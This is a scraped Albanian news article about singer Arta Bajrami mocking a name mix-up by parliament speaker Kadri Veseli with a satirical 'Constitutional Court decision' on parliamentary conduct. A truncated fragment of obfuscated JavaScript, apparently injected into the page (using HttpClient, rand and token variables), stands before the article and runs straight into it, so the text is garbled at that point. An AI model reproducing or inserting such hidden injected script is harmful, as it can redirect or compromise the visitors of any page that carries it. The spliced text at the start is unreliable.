;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Kryetarja’ Arta Bajrami merr vendimin e parë

By

Dje, padyshim lajmi më interesant i ditës ishte gabimi i kryetarit të Kuvendit Kadri Veseli me emrat.

Ai, kryetaren e re të Gjykatës Kushtetuese, Arta Rama – Hajrizin e ngatërroi me këngëtaren Arta Bajrami në njërën prej mbledhjeve.

Duket se ky gabim i ka pëlqyer këngëtares e cila edhe sot është marrë me këtë zhvillim. Ajo ka hartuar një ‘vendim’ tashmë kur e ka ‘postin’ e ri si e para e Kushtetueses ku thuhet:

Gjykata Kushtetuese me në krye mua, Arta Bajrami, merr vendimin që:

1. Seanca e ardhshme parlamentare të mbahet pa pranin e vezëve, gazit lotsjellës, filikaqave etj. Kuvend është ai dhe jo kopsht parashkollor.

2. Të gjith parlamentarët e përshirë në incidente, çoftë gjuajtje me vezë apo përdorim i fjalorit ku duhet vënë “piiiiiip” detyrohen të vijojnë kursin “Si të sillemi si njerëz të rritur?”, para se tu lejohet kthimi në vende të punës.

3. Parlamentarët që mendojnë se kuvendi është një “odë që ua ka lënë baba” dhe ata vendosin çfar të duan, por edhe ata që përdorin forcën dhe jo argumentin për të bindur elektoratin apo marrë pushtetin, detyrohen të ndrrojnë profesion. Në blegtori ka mjaft vende të lira të punës. Pozita më e lakmueshme: bari/bareshë.

Refuzimi i zbatimit ose shkelja e këtyre rregullave dënohet sipas ligjeve te kushtetutës së Kosovës.

Arta, kryetare e këtij institucioni.

Me gjasë, Arta Bajrami do të ishte mjaft e rreptë nëse këtë detyrë do ta zbatonte në realitet. /Prive.al/

Artikuj të ngjashëm